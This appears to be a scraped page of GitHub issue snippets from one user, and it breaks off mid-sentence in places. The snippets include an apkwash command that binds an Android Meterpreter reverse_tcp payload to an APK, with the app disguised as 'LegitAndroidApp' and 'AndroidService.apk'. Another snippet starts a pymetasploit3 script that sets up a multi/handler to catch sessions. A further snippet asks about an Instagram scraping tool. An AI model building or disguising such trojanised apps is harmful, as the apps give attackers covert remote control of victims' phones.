gnu-like
gnu-like
Using command: `apkwash -x my.apk -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=my_port` Output failing: `Error: INSTALL_PARSE_FAILED_NO_CERTIFICATES`
strings.xml: ``` LegitAndroidApp ` ``` after installing the name must be outFile="AndroidService.apk" because ``` fullPath=$outFile APK=$(basename $fullPath) ```
My isp's ip changed but couldn't connect instalooter,although I confirmed the ip that's me in login activity of instagram.`instalooter v2.4.4`
> I found a quick fix I have seen in another instagram repo ( a php one): > > In file InstaLooter/instalooter/looters.py: > change this line : > data =...
I wrote a loop but something causing failed : ``` #!/usr/bin/env python3 from pymetasploit3.msfrpc import MsfRpcClient from time import sleep import sys client = MsfRpcClient('1234', port=55553) exploit = client.modules.use('exploit', 'multi/handler')...